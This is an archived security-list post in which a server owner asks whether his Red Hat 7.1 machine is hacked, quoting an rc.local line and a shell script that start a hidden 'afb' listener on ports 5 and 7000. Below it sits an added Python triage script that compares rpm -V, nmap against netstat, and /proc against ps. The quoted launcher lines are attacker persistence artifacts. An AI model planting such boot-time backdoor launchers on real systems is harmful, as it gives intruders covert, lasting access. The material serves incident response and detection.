I found suspicious looking files on a Redhat 7.1 Linux server earlier today. Can anyone confirm or deny that the machine has been hacked?

The files:

  /usr/bin/hpd
  /usr/bin/afb
  /usr/bin/sn

The following line is in /etc/rc.local:

  /usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null

The contents of hpd are:

  #!/bin/sh
  /usr/bin/./afb -f /bin/sc -q -p 5 -h /bin/hk >/dev/null
  /usr/bin/./afb -f /bin/sc -q -p 7000 -h /bin/hk >/dev/null

nmap reports the following ports open:

  Port       State       Service
  5/tcp      open        rje
  22/tcp     open        ssh
  25/tcp     open        smtp
  53/tcp     open        domain
  80/tcp     open        http
  111/tcp    open        sunrpc
  443/tcp    open        https
  808/tcp    open        unknown
  1024/tcp   open        kdm
  3306/tcp   open        mysql
  7000/tcp   open        afs3-fileserver
  8009/tcp   open        ajp13

According to an rpm -V, all kinds of binaries have been changed: ps, top, netstat, ifconfig, ...

I copied a good version of ps in and found the two afb processes running.

Anyone know about this hack, what afb does and/or how they usually get in?

Embarrassedly,
-Gordon

--
Gordon Chamberlin
Software Architect
Visualize, Inc.
http://www.visualize.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Dec 20 2002 - 19:57:27 PST
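Added example, not part of Gordon's post and not code from any tool he mentions. It automates the three cross-checks the post performs by hand on a suspected userland rootkit: parsing `rpm -V` output to list packaged executables whose contents were replaced, comparing an external nmap scan with the local netstat listing to find listeners the trojaned netstat hides, and comparing pids present in /proc with what the suspect `ps` prints. All sample inputs (the rpm -V lines, the nmap and netstat listings, the /proc entries, the pids) are constructed to resemble the post's findings; the list of rootkit target binaries is an assumption based on common replacement sets, not something the post states.

```python
"""Triage helpers for a suspected userland rootkit on an RPM-based host.

Three independent cross-checks:
  1. rpm -Va output   -> packaged executables whose digest no longer matches
  2. nmap vs netstat  -> TCP listeners the local netstat does not report
  3. /proc vs ps      -> pids present in /proc that the suspect ps omits
Every sample input below is constructed; nothing here comes from a real host.
"""
import os
import re

# --- 1. rpm -V ------------------------------------------------------------
# rpm 3.x (Red Hat 7.1) prints 8 flag columns (SM5DLUGT); rpm 4.x prints 9
# (SM5DLUGTP). A "5" means the file's digest differs from the package header.
VERIFY_RE = re.compile(
    r"^(?P<flags>[SM5DLUGTP.?]{8,9})\s+(?:(?P<attr>[cdglr])\s+)?(?P<path>/\S+)$")
MISSING_RE = re.compile(r"^missing\s+(?:(?P<attr>[cdglr])\s+)?(?P<path>/\S+)$")
EXEC_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
             "/usr/local/bin/", "/usr/local/sbin/")
# Assumed set of binaries that userland rootkits commonly replace.
ROOTKIT_TARGETS = {"ps", "top", "netstat", "ifconfig", "ls", "find",
                   "login", "du", "lsof", "syslogd"}

# Constructed rpm -Va output: 8-column lines plus one 9-column line.
SAMPLE_RPM_V = """\
S.5....T   /bin/ps
S.5....T   /usr/bin/top
S.5....T   /bin/netstat
S.5....T   /sbin/ifconfig
S.5....T c /etc/hosts
.......T   /usr/share/man/man1/ls.1.gz
missing    /usr/share/doc/foo-1.0/README
S.5....T.  /bin/ls
"""


def parse_rpm_verify(text):
    """Return (path, flags, is_config) tuples for each rpm -V line."""
    out = []
    for line in text.splitlines():
        line = line.rstrip()
        m = VERIFY_RE.match(line)
        if m:
            out.append((m["path"], m["flags"], m["attr"] == "c"))
            continue
        m = MISSING_RE.match(line)
        if m:
            out.append((m["path"], "missing", m["attr"] == "c"))
    return out


def replaced_executables(records):
    """Packaged executables whose digest changed. Config files (attr c)
    are skipped because local edits there are expected."""
    return sorted(path for path, flags, cfg in records
                  if "5" in flags and not cfg and path.startswith(EXEC_DIRS))


def rootkit_target_hits(paths):
    """Subset of changed executables that are classic rootkit targets."""
    return sorted(p for p in paths if os.path.basename(p) in ROOTKIT_TARGETS)


# --- 2. nmap (remote view) vs netstat (local view) ------------------------
NMAP_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\b")
# netstat -an; TCP listeners only (UDP sockets carry no LISTEN state).
NETSTAT_RE = re.compile(
    r"^(?P<proto>tcp|udp)\S*\s+\d+\s+\d+\s+\S+:(?P<port>\d+)\s+\S+\s+LISTEN")

SAMPLE_NMAP = """\
Port       State       Service
5/tcp      open        rje
22/tcp     open        ssh
80/tcp     open        http
7000/tcp   open        afs3-fileserver
"""
# Constructed netstat -an from the suspect: the trojaned binary omits 5 and 7000.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.0.2.10:22           198.51.100.7:40122      ESTABLISHED
"""


def nmap_open_ports(text):
    return {(m["proto"], int(m["port"]))
            for m in map(NMAP_RE.match, text.splitlines()) if m}


def netstat_listeners(text):
    return {(m["proto"], int(m["port"]))
            for m in map(NETSTAT_RE.match, text.splitlines()) if m}


def hidden_listeners(nmap_text, netstat_text):
    """Ports the network sees open that the local netstat does not report."""
    return sorted(nmap_open_ports(nmap_text) - netstat_listeners(netstat_text))


# --- 3. /proc vs ps -------------------------------------------------------
def proc_pids(entries):
    """Numeric entries of a /proc listing (pass os.listdir('/proc') live)."""
    return {int(e) for e in entries if e.isdigit()}


def ps_pids(text):
    """Pids from `ps -eo pid=` style output, one pid per line."""
    return {int(tok) for tok in text.split() if tok.isdigit()}


def hidden_pids(proc_entries, ps_text):
    """Pids that exist in /proc but the suspect ps does not list."""
    return sorted(proc_pids(proc_entries) - ps_pids(ps_text))


SAMPLE_PROC = ["1", "2", "417", "1342", "1343", "self", "cpuinfo", "net"]
SAMPLE_PS = "1\n2\n417\n"   # constructed trojaned ps output: 1342, 1343 hidden

if __name__ == "__main__":
    changed = replaced_executables(parse_rpm_verify(SAMPLE_RPM_V))
    print("replaced executables:", changed)
    print("rootkit targets among them:", rootkit_target_hits(changed))
    print("listeners netstat hides:", hidden_listeners(SAMPLE_NMAP, SAMPLE_NETSTAT))
    print("pids ps hides:", hidden_pids(SAMPLE_PROC, SAMPLE_PS))
```

Two caveats apply on a real host. `rpm -V` only covers files that belong to a package, so unowned files such as the ones in the post never appear in its output and have to be found separately (for example `rpm -qf` on anything unusual under /usr/bin), and it trusts the local rpm binary and database, which can themselves be altered; run rpm from known-good media or compare against vendor checksums. The /proc comparison only exposes processes hidden by a replaced `ps`; a kernel-module rootkit can filter /proc as well, so the comparison should be repeated from a rescue boot, with the network scan from a second machine as the view the compromised host cannot tamper with.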